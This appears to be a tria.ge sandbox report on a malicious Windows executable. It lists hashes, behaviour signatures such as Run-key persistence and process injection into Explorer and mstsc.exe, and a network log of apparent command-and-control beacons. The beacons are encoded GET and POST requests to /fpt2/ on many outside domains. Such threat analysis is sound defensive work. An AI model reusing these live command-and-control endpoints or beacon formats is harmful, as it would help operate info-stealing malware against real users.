Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    22/11/2023, 05:18 UTC

General

  • Target

    NEW INQ vGT410267234500633.exe

  • Size

    384KB

  • MD5

    d94b223af3fd6bedbc1552ffc63b85cd

  • SHA1

    d7524fd3525faa6af6d4c329167c322062fb77b6

  • SHA256

    bca02faf8b705cffad72deb87ef895ce6626636d498e05b274b079c9ace3dc5b

  • SHA512

    e91ef8c196f5fae0c5f097175c67c2a7a7988d384ee3bba0468deb4c22c6c3292b4b138cd382430922d80d95daed227057870364fdf0ba5ec413dd61c0162955

  • SSDEEP

    12288:RKt9zvWPOpk/oxQD9inI3PnmLws4475zzgBQvamwvq:oLzpxQD9iIPn38zzwi

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Users\Admin\AppData\Local\Temp\NEW INQ vGT410267234500633.exe
      "C:\Users\Admin\AppData\Local\Temp\NEW INQ vGT410267234500633.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
        "C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
          "C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:2552
    • C:\Windows\SysWOW64\autofmt.exe
      "C:\Windows\SysWOW64\autofmt.exe"
      2⤵
        PID:2644
      • C:\Windows\SysWOW64\mstsc.exe
        "C:\Windows\SysWOW64\mstsc.exe"
        2⤵
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Program Files\Mozilla Firefox\Firefox.exe
          "C:\Program Files\Mozilla Firefox\Firefox.exe"
          3⤵
            PID:1480

      Network

      • flag-us
        DNS
        www.ljwixsb.top
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.ljwixsb.top
        IN A
        Response
      • flag-us
        DNS
        www.mobdigim.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.mobdigim.com
        IN A
        Response
        www.mobdigim.com
        IN CNAME
        mobdigim.com
        mobdigim.com
        IN A
        136.243.92.92
      • flag-de
        GET
        http://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        136.243.92.92:80
        Request
        GET /fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt- HTTP/1.1
        Host: www.mobdigim.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 301 Moved Permanently
        Connection: close
        content-type: text/html
        content-length: 707
        date: Wed, 22 Nov 2023 05:19:15 GMT
        server: LiteSpeed
        location: https://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-
      • flag-us
        DNS
        www.sqlite.org
        mstsc.exe
        Remote address:
        8.8.8.8:53
        Request
        www.sqlite.org
        IN A
        Response
        www.sqlite.org
        IN A
        45.33.6.223
      • flag-us
        GET
        http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip
        mstsc.exe
        Remote address:
        45.33.6.223:80
        Request
        GET /2019/sqlite-dll-win32-x86-3300000.zip HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
        Host: www.sqlite.org
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Connection: keep-alive
        Date: Wed, 22 Nov 2023 05:19:17 GMT
        Last-Modified: Fri, 04 Oct 2019 22:26:08 GMT
        Cache-Control: max-age=120
        ETag: "m5d97c700s778c6"
        Content-type: application/zip; charset=utf-8
        Content-length: 489670
      • flag-us
        DNS
        www.finebb.net
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.finebb.net
        IN A
        Response
        www.finebb.net
        IN A
        91.194.2.86
      • flag-ru
        POST
        http://www.finebb.net/fpt2/
        Explorer.EXE
        Remote address:
        91.194.2.86:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.finebb.net
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.finebb.net
        Referer: http://www.finebb.net/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 301 Moved Permanently
        Server: nginx
        Date: Wed, 22 Nov 2023 05:19:38 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Location: https://finebb.net/fpt2/
        Cache-Control: must-revalidate
        Set-Cookie: uid=W8ICVmVdj2qiuz6uA3ZvAgA=; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
      • flag-ru
        GET
        http://www.finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        91.194.2.86:80
        Request
        GET /fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt- HTTP/1.1
        Host: www.finebb.net
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 301 Moved Permanently
        Server: nginx
        Date: Wed, 22 Nov 2023 05:19:41 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Location: https://finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-
        Cache-Control: must-revalidate
        Set-Cookie: uid=W8ICVmVdj22iuz6uA3aAAgA=; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
      • flag-us
        DNS
        www.yf168vip.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.yf168vip.com
        IN A
        Response
        www.yf168vip.com
        IN CNAME
        bt-cn-3.168-system.com
        bt-cn-3.168-system.com
        IN A
        34.92.57.107
      • flag-hk
        POST
        http://www.yf168vip.com/fpt2/
        Explorer.EXE
        Remote address:
        34.92.57.107:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.yf168vip.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.yf168vip.com
        Referer: http://www.yf168vip.com/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Wed, 22 Nov 2023 05:19:34 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
      • flag-hk
        GET
        http://www.yf168vip.com/fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        34.92.57.107:80
        Request
        GET /fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt- HTTP/1.1
        Host: www.yf168vip.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Wed, 22 Nov 2023 05:19:36 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
      • flag-us
        DNS
        www.shortfall.net
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.shortfall.net
        IN A
        Response
        www.shortfall.net
        IN A
        13.248.169.48
        www.shortfall.net
        IN A
        76.223.54.146
      • flag-us
        POST
        http://www.shortfall.net/fpt2/
        Explorer.EXE
        Remote address:
        13.248.169.48:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.shortfall.net
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.shortfall.net
        Referer: http://www.shortfall.net/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 405 Not Allowed
        Server: openresty
        Date: Wed, 22 Nov 2023 05:19:42 GMT
        Content-Type: text/html
        Content-Length: 556
        Connection: close
        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_A0tSUQlWfk9RcYiBisFjUp4mJhZjoalv4NIolWeZ1z/VwC4r2T9Lxeabwd6qYQX7b07cV5twCRWXJSV7TsJ7Ig
      • flag-us
        GET
        http://www.shortfall.net/fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        13.248.169.48:80
        Request
        GET /fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt- HTTP/1.1
        Host: www.shortfall.net
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 200 OK
        Server: openresty
        Date: Wed, 22 Nov 2023 05:19:44 GMT
        Content-Type: text/html
        Content-Length: 12477
        Last-Modified: Mon, 13 Nov 2023 23:35:47 GMT
        Connection: close
        ETag: "6552b2d3-30bd"
        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RCsCR8ZgI9ytHdgPNLErkSd00hq1wEsr07VzeJRcQ3XIQuOyvFZLYy0I+fUz+/HYWTFLzmqRMD+r0HmvhCDnCA
        Cache-Control: no-cache
        X-Content-Type-Options: nosniff
        Set-Cookie: caf_ipaddr=10.116.88.58;Path=/;Max-Age=86400;
        Set-Cookie: country=;Path=/;Max-Age=86400;
        Set-Cookie: city="";Path=/;Max-Age=86400;
        Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
        Accept-Ranges: bytes
      • flag-us
        DNS
        www.tecverse.xyz
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.tecverse.xyz
        IN A
        Response
        www.tecverse.xyz
        IN A
        203.161.61.170
      • flag-us
        POST
        http://www.tecverse.xyz/fpt2/
        Explorer.EXE
        Remote address:
        203.161.61.170:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.tecverse.xyz
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.tecverse.xyz
        Referer: http://www.tecverse.xyz/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Date: Wed, 22 Nov 2023 05:19:50 GMT
        Server: Apache
        Content-Length: 690
        Connection: close
        Content-Type: text/html
      • flag-us
        GET
        http://www.tecverse.xyz/fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        203.161.61.170:80
        Request
        GET /fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt- HTTP/1.1
        Host: www.tecverse.xyz
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Date: Wed, 22 Nov 2023 05:19:52 GMT
        Server: Apache
        Content-Length: 690
        Connection: close
        Content-Type: text/html; charset=utf-8
      • flag-us
        DNS
        www.hreeremaeps.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.hreeremaeps.com
        IN A
        Response
        www.hreeremaeps.com
        IN CNAME
        hreeremaeps.com
        hreeremaeps.com
        IN A
        185.83.146.204
      • flag-tr
        POST
        http://www.hreeremaeps.com/fpt2/
        Explorer.EXE
        Remote address:
        185.83.146.204:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.hreeremaeps.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.hreeremaeps.com
        Referer: http://www.hreeremaeps.com/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.0 404 Not Found
        Date: Wed, 22 Nov 2023 05:19:58 GMT
        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
        X-Powered-By: PHP/5.4.16
        Content-Length: 0
        Connection: close
        Content-Type: text/html; charset=UTF-8
      • flag-tr
        GET
        http://www.hreeremaeps.com/fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        185.83.146.204:80
        Request
        GET /fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt- HTTP/1.1
        Host: www.hreeremaeps.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.0 404 Not Found
        Date: Wed, 22 Nov 2023 05:20:00 GMT
        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
        X-Powered-By: PHP/5.4.16
        Content-Length: 0
        Connection: close
        Content-Type: text/html; charset=UTF-8
      • flag-us
        DNS
        www.shopbons-mall.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.shopbons-mall.com
        IN A
        Response
        www.shopbons-mall.com
        IN A
        208.91.197.132
      • flag-us
        POST
        http://www.shopbons-mall.com/fpt2/
        Explorer.EXE
        Remote address:
        208.91.197.132:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.shopbons-mall.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.shopbons-mall.com
        Referer: http://www.shopbons-mall.com/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
      • flag-us
        GET
        http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        208.91.197.132:80
        Request
        GET /fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt- HTTP/1.1
        Host: www.shopbons-mall.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 200 OK
        Date: Wed, 22 Nov 2023 05:20:08 GMT
        Server: Apache
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
        Connection: close
      • flag-us
        DNS
        www.cmmug.asia
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.cmmug.asia
        IN A
        Response
        www.cmmug.asia
        IN A
        188.114.96.0
        www.cmmug.asia
        IN A
        188.114.97.0
      • flag-us
        POST
        http://www.cmmug.asia/fpt2/
        Explorer.EXE
        Remote address:
        188.114.96.0:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.cmmug.asia
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.cmmug.asia
        Referer: http://www.cmmug.asia/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 502 Bad Gateway
        Date: Wed, 22 Nov 2023 05:20:14 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 6325
        Connection: close
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Or5sRs6IDBbh%2BoD2CZPC80JTAcbwgqaqlRetwdyN7T%2FM2kFevh6%2BzQxOxhJslCCp8%2Bc51RZ%2Bbf5D12ZQslJx5ssRBMAbnKIDE9NqJUXP1%2BEfEW7nc%2BVR79hpx24LbXmiAA%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Frame-Options: SAMEORIGIN
        Referrer-Policy: same-origin
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Server: cloudflare
        CF-RAY: 829eb8db58511ece-AMS
        alt-svc: h3=":443"; ma=86400
      • flag-us
        GET
        http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        188.114.96.0:80
        Request
        GET /fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt- HTTP/1.1
        Host: www.cmmug.asia
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 502 Bad Gateway
        Date: Wed, 22 Nov 2023 05:20:17 GMT
        Content-Type: text/plain; charset=UTF-8
        Content-Length: 15
        Connection: close
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=67yG8PpQRAA8EpJluWDwC5oNoCScc%2FJlFrrij%2Bjpl3WRJ5LWcLAaabXu1ktHC%2BjEfkojNC56Vusb7BCcP%2F491a3wGdMfFYhTNA2tgmpcUPvDSYTr1CpdpL8F53pP3%2BcS9w%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Frame-Options: SAMEORIGIN
        Referrer-Policy: same-origin
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Server: cloudflare
        CF-RAY: 829eb8eb3e8966c3-AMS
        alt-svc: h3=":443"; ma=86400
      • flag-us
        DNS
        www.333vvs.com
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.333vvs.com
        IN A
        Response
        www.333vvs.com
        IN A
        34.120.175.65
        www.333vvs.com
        IN A
        35.244.161.158
      • flag-us
        POST
        http://www.333vvs.com/fpt2/
        Explorer.EXE
        Remote address:
        34.120.175.65:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.333vvs.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.333vvs.com
        Referer: http://www.333vvs.com/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 405 Method Not Allowed
        Server: nginx/1.20.2
        Date: Wed, 22 Nov 2023 05:20:22 GMT
        Content-Type: text/html
        Content-Length: 559
        Via: 1.1 google
        Connection: close
      • flag-us
        GET
        http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        34.120.175.65:80
        Request
        GET /fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt- HTTP/1.1
        Host: www.333vvs.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.20.2
        Date: Wed, 22 Nov 2023 05:20:25 GMT
        Content-Type: text/html
        Content-Length: 5208
        Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
        Vary: Accept-Encoding
        ETag: "65267254-1458"
        Cache-Control: no-cache
        Accept-Ranges: bytes
        Via: 1.1 google
        Connection: close
      • flag-us
        DNS
        www.gdyanjiu.icu
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.gdyanjiu.icu
        IN A
        Response
        www.gdyanjiu.icu
        IN CNAME
        256.93cu.com
        256.93cu.com
        IN A
        8.217.92.5
      • flag-hk
        POST
        http://www.gdyanjiu.icu/fpt2/
        Explorer.EXE
        Remote address:
        8.217.92.5:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.gdyanjiu.icu
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.gdyanjiu.icu
        Referer: http://www.gdyanjiu.icu/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Wed, 22 Nov 2023 05:20:31 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
      • flag-hk
        GET
        http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        8.217.92.5:80
        Request
